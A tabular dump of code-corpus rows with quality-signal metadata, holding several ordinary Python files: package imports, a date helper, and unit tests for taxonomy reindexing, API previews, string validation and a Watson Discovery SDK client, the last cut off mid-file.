hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cc5569a8a9c9037e5b3728e213e2d0c80c4e873e | 25 | py | Python | src/lib/__init__.py | ueffel/keypirinha-allmygames | 3ef8f641cec9d2165fbafcc7224f65d3fab1089a | [
"MIT"
] | 9 | 2020-05-31T11:13:52.000Z | 2021-09-23T14:26:42.000Z | src/lib/__init__.py | ueffel/keypirinha-allmygames | 3ef8f641cec9d2165fbafcc7224f65d3fab1089a | [
"MIT"
] | 9 | 2020-05-31T11:55:10.000Z | 2022-01-22T11:22:55.000Z | src/lib/__init__.py | ueffel/keypirinha-allmygames | 3ef8f641cec9d2165fbafcc7224f65d3fab1089a | [
"MIT"
] | 1 | 2020-09-11T17:40:51.000Z | 2020-09-11T17:40:51.000Z | from .steam import Steam
| 12.5 | 24 | 0.8 | 4 | 25 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cc5bac568ec9e9c7466e7d8d6cde2b57d9041b78 | 26 | py | Python | agent/sensor/__init__.py | intelligent-control-lab/Composable_Agent_Toolbox | 39d71cdc0475ae6901cb30b63d181737bea35889 | [
"MIT"
] | 4 | 2020-10-20T14:30:09.000Z | 2022-02-19T23:46:04.000Z | agent/sensor/__init__.py | intelligent-control-lab/Composable_Agent_Toolbox | 39d71cdc0475ae6901cb30b63d181737bea35889 | [
"MIT"
] | null | null | null | agent/sensor/__init__.py | intelligent-control-lab/Composable_Agent_Toolbox | 39d71cdc0475ae6901cb30b63d181737bea35889 | [
"MIT"
] | 1 | 2022-03-12T10:46:38.000Z | 2022-03-12T10:46:38.000Z | from .sensor import Sensor | 26 | 26 | 0.846154 | 4 | 26 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 26 | 1 | 26 | 26 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cc6a0557624c5878181ad647171486e965d7e4cb | 100 | py | Python | kipoi/external/related/__init__.py | bfclarke/kipoi | 992b41eee8e35b39ae61262d988db974d8583759 | [
"MIT"
] | 213 | 2018-03-13T17:25:32.000Z | 2022-03-07T15:29:29.000Z | kipoi/external/related/__init__.py | bfclarke/kipoi | 992b41eee8e35b39ae61262d988db974d8583759 | [
"MIT"
] | 317 | 2018-03-14T11:03:57.000Z | 2022-03-31T17:48:54.000Z | kipoi/external/related/__init__.py | bfclarke/kipoi | 992b41eee8e35b39ae61262d988db974d8583759 | [
"MIT"
] | 44 | 2018-03-13T17:44:34.000Z | 2022-01-10T08:14:49.000Z | from kipoi_utils.external.related import * # backward comp
from . import mixins
from . import fields | 33.333333 | 58 | 0.8 | 14 | 100 | 5.642857 | 0.714286 | 0.253165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14 | 100 | 3 | 59 | 33.333333 | 0.918605 | 0.13 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cc7d399a69cc932e4997d3a9feb524f4913ade8e | 146 | py | Python | signups/utils.py | City-of-Helsinki/open-city-signups | 3c36d3c1cba6f6fc85deadc54fb49a4318f4b1d4 | [
"MIT"
] | null | null | null | signups/utils.py | City-of-Helsinki/open-city-signups | 3c36d3c1cba6f6fc85deadc54fb49a4318f4b1d4 | [
"MIT"
] | 10 | 2018-05-15T12:29:07.000Z | 2020-06-05T19:20:34.000Z | signups/utils.py | City-of-Helsinki/opencity-signups | 3c36d3c1cba6f6fc85deadc54fb49a4318f4b1d4 | [
"MIT"
] | 1 | 2018-05-15T10:47:45.000Z | 2018-05-15T10:47:45.000Z | from django.utils import formats, timezone
def localize_datetime(dt):
return formats.date_format(timezone.localtime(dt), 'DATETIME_FORMAT')
| 24.333333 | 73 | 0.794521 | 19 | 146 | 5.947368 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109589 | 146 | 5 | 74 | 29.2 | 0.869231 | 0 | 0 | 0 | 0 | 0 | 0.10274 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
cc92c6a7a3ff3af69dea9d701bc21b05c26eeb2a | 7,132 | py | Python | tests/utils/test_df_reindex.py | motleystate/moonstone | 37c38fabf361722f7002626ef13c68c443ace4ac | [
"MIT"
] | null | null | null | tests/utils/test_df_reindex.py | motleystate/moonstone | 37c38fabf361722f7002626ef13c68c443ace4ac | [
"MIT"
] | 84 | 2020-07-27T13:01:12.000Z | 2022-03-16T17:10:23.000Z | tests/utils/test_df_reindex.py | motleystate/moonstone | 37c38fabf361722f7002626ef13c68c443ace4ac | [
"MIT"
] | null | null | null | from unittest import TestCase
import pandas as pd
from moonstone.utils.df_reindex import GenesToTaxonomy
class TestGenesToTaxonomy(TestCase):
def test_reindex_with_taxonomy(self):
df = pd.DataFrame(
[
[23, 7],
[15, 4],
],
columns=['sample_1', 'sample_2'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_taxo = pd.DataFrame(
[
[147802,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Lactobacillaceae; g__Lactobacillus; s__iners'],
[1352,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Enterococcaceae; g__Enterococcus; s__faecium']
],
columns=['tax_id', 'full_tax'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_expected = pd.DataFrame.from_dict(
{
'sample_1':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 23,
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Enterococcaceae', 'Enterococcus', 'Enterococcus_faecium'): 15
},
'sample_2':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 7,
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Enterococcaceae', 'Enterococcus', 'Enterococcus_faecium'): 4}
}
)
df_expected.index.set_names(["kingdom", "phylum", "class", "order", "family", "genus", "species"], inplace=True)
reindexation_instance = GenesToTaxonomy(df, df_taxo)
reindexed_df = reindexation_instance.reindexed_df
pd.testing.assert_frame_equal(reindexed_df, df_expected)
def test_reindex_with_taxonomy_missing_infos(self):
# for now, if there aren't any taxonomic information, the gene is dropped
df = pd.DataFrame(
[
[23, 7],
[15, 4],
],
columns=['sample_1', 'sample_2'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_taxo = pd.DataFrame(
[
[147802,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Lactobacillaceae; g__Lactobacillus; s__iners'],
[1352,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Enterococcaceae; g__Enterococcus; s__faecium']
],
columns=['tax_id', 'full_tax'],
index=['gene_1', 'gene_3'] # index dtype='object'
)
df_expected = pd.DataFrame.from_dict(
{
'sample_1':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 23
},
'sample_2':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 7
}
}
)
df_expected.index.set_names(["kingdom", "phylum", "class", "order", "family", "genus", "species"], inplace=True)
reindexation_instance = GenesToTaxonomy(df, df_taxo)
reindexed_df = reindexation_instance.reindexed_df
pd.testing.assert_frame_equal(reindexed_df, df_expected)
pd.testing.assert_index_equal(reindexation_instance.without_info_index, pd.Index(['gene_2'], dtype='object'))
def test_reindex_with_taxonomy_summing(self):
df = pd.DataFrame(
[
[23, 7],
[15, 4],
],
columns=['sample_1', 'sample_2'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_taxo = pd.DataFrame(
[
[147802,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Lactobacillaceae; g__Lactobacillus; s__iners'],
[147802,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Lactobacillaceae; g__Lactobacillus; s__iners']
],
columns=['tax_id', 'full_tax'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_expected = pd.DataFrame.from_dict(
{
'sample_1':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 38
},
'sample_2':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 11,
}
}
)
df_expected.index.set_names(["kingdom", "phylum", "class", "order", "family", "genus", "species"], inplace=True)
reindexation_instance = GenesToTaxonomy(df, df_taxo)
reindexed_df = reindexation_instance.reindexed_df
pd.testing.assert_frame_equal(reindexed_df, df_expected)
def test_reindex_with_taxonomy_counting(self):
df = pd.DataFrame(
[
[23, 7],
[15, 0],
],
columns=['sample_1', 'sample_2'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_taxo = pd.DataFrame(
[
[147802,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Lactobacillaceae; g__Lactobacillus; s__iners'],
[147802,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Lactobacillaceae; g__Lactobacillus; s__iners']
],
columns=['tax_id', 'full_tax'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_expected = pd.DataFrame.from_dict(
{
'sample_1':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 2
},
'sample_2':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 1,
}
}
)
df_expected.index.set_names(["kingdom", "phylum", "class", "order", "family", "genus", "species"], inplace=True)
reindexation_instance = GenesToTaxonomy(df, df_taxo)
reindexed_df = reindexation_instance.reindex_with_taxonomy(method='count')
pd.testing.assert_frame_equal(reindexed_df, df_expected)
| 40.067416 | 120 | 0.531969 | 616 | 7,132 | 5.766234 | 0.159091 | 0.037162 | 0.070383 | 0.112613 | 0.905687 | 0.891047 | 0.891047 | 0.884854 | 0.83643 | 0.82348 | 0 | 0.024919 | 0.347308 | 7,132 | 177 | 121 | 40.293785 | 0.738131 | 0.033511 | 0 | 0.603659 | 0 | 0 | 0.194537 | 0 | 0 | 0 | 0 | 0 | 0.030488 | 1 | 0.02439 | false | 0 | 0.018293 | 0 | 0.04878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ccba47fc57350431d1be8b2239757900d9dab334 | 2,015 | py | Python | tests/cases/resources/tests/preview.py | rysdyk/serrano | 926d874b19efdd18e359d32bca601058b655b288 | [
"BSD-2-Clause"
] | null | null | null | tests/cases/resources/tests/preview.py | rysdyk/serrano | 926d874b19efdd18e359d32bca601058b655b288 | [
"BSD-2-Clause"
] | null | null | null | tests/cases/resources/tests/preview.py | rysdyk/serrano | 926d874b19efdd18e359d32bca601058b655b288 | [
"BSD-2-Clause"
] | 1 | 2020-01-16T15:26:37.000Z | 2020-01-16T15:26:37.000Z | import json
from django.contrib.auth.models import User
from django.test import TestCase
class PreviewResourceTestCase(TestCase):
def test_get(self):
response = self.client.get('/api/data/preview/',
HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json')
self.assertEqual(json.loads(response.content), {
'_links': {
'self': {
'href': 'http://testserver/api/data/preview/?limit=20&page=1',
},
'base': {
'href': 'http://testserver/api/data/preview/',
}
},
'keys': [],
'count': 0,
'object_count': 0,
'object_name': 'employee',
'object_name_plural': 'employees',
'objects': [],
'page_num': 1,
'num_pages': 1,
'limit': 20,
})
def test_get_with_user(self):
self.user = User.objects.create_user(username='test', password='test')
self.client.login(username='test', password='test')
response = self.client.get('/api/data/preview/',
HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json')
self.assertEqual(json.loads(response.content), {
'_links': {
'self': {
'href': 'http://testserver/api/data/preview/?limit=20&page=1',
},
'base': {
'href': 'http://testserver/api/data/preview/',
}
},
'keys': [],
'count': 0,
'object_count': 0,
'object_name': 'employee',
'object_name_plural': 'employees',
'objects': [],
'page_num': 1,
'num_pages': 1,
'limit': 20,
})
| 34.152542 | 82 | 0.496278 | 186 | 2,015 | 5.252688 | 0.290323 | 0.042989 | 0.085977 | 0.122825 | 0.755374 | 0.755374 | 0.755374 | 0.755374 | 0.755374 | 0.755374 | 0 | 0.018391 | 0.352357 | 2,015 | 58 | 83 | 34.741379 | 0.730268 | 0 | 0 | 0.740741 | 0 | 0 | 0.27196 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.037037 | false | 0.037037 | 0.055556 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ccd43ac780845a390394a262b73271626dc4cf9e | 4,319 | py | Python | toshi/test/test_validation.py | IceExchange/ice-services-lib | 67a304ed4be183ed4b521624fc48be67936d141e | [
"MIT"
] | null | null | null | toshi/test/test_validation.py | IceExchange/ice-services-lib | 67a304ed4be183ed4b521624fc48be67936d141e | [
"MIT"
] | null | null | null | toshi/test/test_validation.py | IceExchange/ice-services-lib | 67a304ed4be183ed4b521624fc48be67936d141e | [
"MIT"
] | null | null | null | import unittest
from toshi import utils
class TestValidation(unittest.TestCase):
def test_validate_address(self):
self.assertTrue(utils.validate_address("0x056db290f8ba3250ca64a45d16284d04bc6f5fbf"))
self.assertTrue(utils.validate_address(u"0x056db290f8ba3250ca64a45d16284d04bc6f5fbf"))
self.assertFalse(utils.validate_address("hello"))
self.assertFalse(utils.validate_address("0x12345"))
self.assertFalse(utils.validate_address(None))
self.assertFalse(utils.validate_address({}))
self.assertFalse(utils.validate_address(0x056db290f8ba3250ca64a45d16284d04bc6f5fbf))
self.assertFalse(utils.validate_address("0x114655db4898a6580f0abfc53fc0c0a88110724abf8d41f2abf206c69d7d4c821ed2cdf6939484ef6aebc39ce5662363b82140106bbc374a0f1381b6948214b001"))
def test_validate_signature(self):
self.assertTrue(utils.validate_signature("0x114655db4898a6580f0abfc53fc0c0a88110724abf8d41f2abf206c69d7d4c821ed2cdf6939484ef6aebc39ce5662363b82140106bbc374a0f1381b6948214b001"))
self.assertTrue(utils.validate_signature(u"0x114655db4898a6580f0abfc53fc0c0a88110724abf8d41f2abf206c69d7d4c821ed2cdf6939484ef6aebc39ce5662363b82140106bbc374a0f1381b6948214b001"))
self.assertFalse(utils.validate_signature("hello"))
self.assertFalse(utils.validate_signature("0x12345"))
self.assertFalse(utils.validate_signature(None))
self.assertFalse(utils.validate_signature({}))
self.assertFalse(utils.validate_signature(0x114655db4898a6580f0abfc53fc0c0a88110724abf8d41f2abf206c69d7d4c821ed2cdf6939484ef6aebc39ce5662363b82140106bbc374a0f1381b6948214b001))
self.assertFalse(utils.validate_signature("0x056db290f8ba3250ca64a45d16284d04bc6f5fbf"))
def test_validate_hex_string(self):
self.assertTrue(utils.validate_hex_string("0x1"))
self.assertTrue(utils.validate_hex_string(u"0x1"))
self.assertTrue(utils.validate_hex_string("0xA"))
self.assertTrue(utils.validate_hex_string("0xABCDEF"))
self.assertFalse(utils.validate_hex_string("0xHIJKL"))
self.assertFalse(utils.validate_hex_string(12345))
self.assertFalse(utils.validate_hex_string(0xABC))
self.assertFalse(utils.validate_hex_string(None))
self.assertFalse(utils.validate_hex_string({}))
self.assertFalse(utils.validate_hex_string("ABCDEF"))
self.assertFalse(utils.validate_hex_string("0x"))
def test_validate_int_string(self):
self.assertTrue(utils.validate_int_string("12345"))
self.assertTrue(utils.validate_int_string(u"12345"))
self.assertTrue(utils.validate_int_string("1"))
self.assertTrue(utils.validate_int_string("-1"))
self.assertTrue(utils.validate_int_string("2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001"))
self.assertFalse(utils.validate_int_string("1.2"))
self.assertFalse(utils.validate_int_string("0xABC"))
self.assertFalse(utils.validate_int_string(0xABC))
self.assertFalse(utils.validate_int_string(None))
self.assertFalse(utils.validate_int_string({}))
self.assertFalse(utils.validate_int_string("ABCDEF"))
self.assertFalse(utils.validate_int_string("01"))
def test_validate_decimal_string(self):
self.assertTrue(utils.validate_decimal_string("12345.0000"))
self.assertTrue(utils.validate_decimal_string(u"12345.0000"))
self.assertTrue(utils.validate_decimal_string("12345.12345"))
self.assertTrue(utils.validate_decimal_string("-1.2"))
self.assertTrue(utils.validate_decimal_string("1.0"))
self.assertTrue(utils.validate_decimal_string("2.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001"))
self.assertFalse(utils.validate_decimal_string("1"))
self.assertFalse(utils.validate_decimal_string("0xABC"))
self.assertFalse(utils.validate_decimal_string(0xABC))
self.assertFalse(utils.validate_decimal_string(None))
self.assertFalse(utils.validate_decimal_string({}))
self.assertFalse(utils.validate_decimal_string("ABCDEF"))
self.assertFalse(utils.validate_decimal_string("01.1"))
| 59.164384 | 186 | 0.782125 | 394 | 4,319 | 8.317259 | 0.104061 | 0.206286 | 0.201404 | 0.281965 | 0.805005 | 0.606958 | 0.217577 | 0.140983 | 0.111077 | 0.111077 | 0 | 0.205209 | 0.119935 | 4,319 | 72 | 187 | 59.986111 | 0.656932 | 0 | 0 | 0 | 0 | 0 | 0.212086 | 0.179903 | 0 | 0 | 0.174114 | 0 | 0.866667 | 1 | 0.083333 | false | 0 | 0.033333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ccd52b38ce025e9f08a5ee67412f7a4dd5fc8e4c | 43,194 | py | Python | test/unit/test_discovery_v1.py | SamArtGS/python-sdk | 7be6a4fe75d4a9fd365ef626d6289c0dc8457f3a | [
"Apache-2.0"
] | 1 | 2018-10-04T19:13:44.000Z | 2018-10-04T19:13:44.000Z | test/unit/test_discovery_v1.py | SamArtGS/python-sdk | 7be6a4fe75d4a9fd365ef626d6289c0dc8457f3a | [
"Apache-2.0"
] | null | null | null | test/unit/test_discovery_v1.py | SamArtGS/python-sdk | 7be6a4fe75d4a9fd365ef626d6289c0dc8457f3a | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
import responses
import os
import json
import io
import watson_developer_cloud
from watson_developer_cloud.discovery_v1 import TrainingDataSet, TrainingQuery, TrainingExample
try:
from urllib.parse import urlparse, urljoin
except ImportError:
from urlparse import urlparse, urljoin
base_discovery_url = 'https://gateway.watsonplatform.net/discovery/api/v1/'
platform_url = 'https://gateway.watsonplatform.net'
service_path = '/discovery/api'
base_url = '{0}{1}'.format(platform_url, service_path)
version = '2016-12-01'
environment_id = 'envid'
collection_id = 'collid'
@responses.activate
def test_environments():
discovery_url = urljoin(base_discovery_url, 'environments')
discovery_response_body = """{
"environments": [
{
"environment_id": "string",
"name": "envname",
"description": "",
"created": "2016-11-20T01:03:17.645Z",
"updated": "2016-11-20T01:03:17.645Z",
"status": "status",
"index_capacity": {
"disk_usage": {
"used_bytes": 0,
"total_bytes": 0,
"used": "string",
"total": "string",
"percent_used": 0
},
"memory_usage": {
"used_bytes": 0,
"total_bytes": 0,
"used": "string",
"total": "string",
"percent_used": 0
}
}
}
]
}"""
responses.add(responses.GET, discovery_url,
body=discovery_response_body, status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.list_environments()
url_str = "{0}?version=2016-11-07".format(discovery_url)
assert responses.calls[0].request.url == url_str
assert responses.calls[0].response.text == discovery_response_body
assert len(responses.calls) == 1
@responses.activate
def test_get_environment():
discovery_url = urljoin(base_discovery_url, 'environments/envid')
responses.add(responses.GET, discovery_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.get_environment(environment_id='envid')
url_str = "{0}?version=2016-11-07".format(discovery_url)
assert responses.calls[0].request.url == url_str
assert len(responses.calls) == 1
@responses.activate
def test_create_environment():
discovery_url = urljoin(base_discovery_url, 'environments')
responses.add(responses.POST, discovery_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.create_environment(name="my name", description="my description")
assert len(responses.calls) == 1
@responses.activate
def test_update_environment():
discovery_url = urljoin(base_discovery_url, 'environments/envid')
responses.add(responses.PUT, discovery_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.update_environment('envid', name="hello", description="new")
assert len(responses.calls) == 1
@responses.activate
def test_delete_environment():
discovery_url = urljoin(base_discovery_url, 'environments/envid')
responses.add(responses.DELETE, discovery_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.delete_environment('envid')
assert len(responses.calls) == 1
@responses.activate
def test_collections():
discovery_url = urljoin(base_discovery_url,
'environments/envid/collections')
responses.add(responses.GET, discovery_url,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.list_collections('envid')
called_url = urlparse(responses.calls[0].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
assert len(responses.calls) == 1
@responses.activate
def test_collection():
discovery_url = urljoin(base_discovery_url,
'environments/envid/collections/collid')
discovery_fields = urljoin(base_discovery_url,
'environments/envid/collections/collid/fields')
config_url = urljoin(base_discovery_url,
'environments/envid/configurations')
responses.add(responses.GET, config_url,
body="{\"body\": \"hello\"}",
status=200,
content_type='application/json')
responses.add(responses.GET, discovery_fields,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
responses.add(responses.GET, discovery_url,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
responses.add(responses.DELETE, discovery_url,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
responses.add(responses.POST,
urljoin(base_discovery_url,
'environments/envid/collections'),
body="{\"body\": \"create\"}",
status=200,
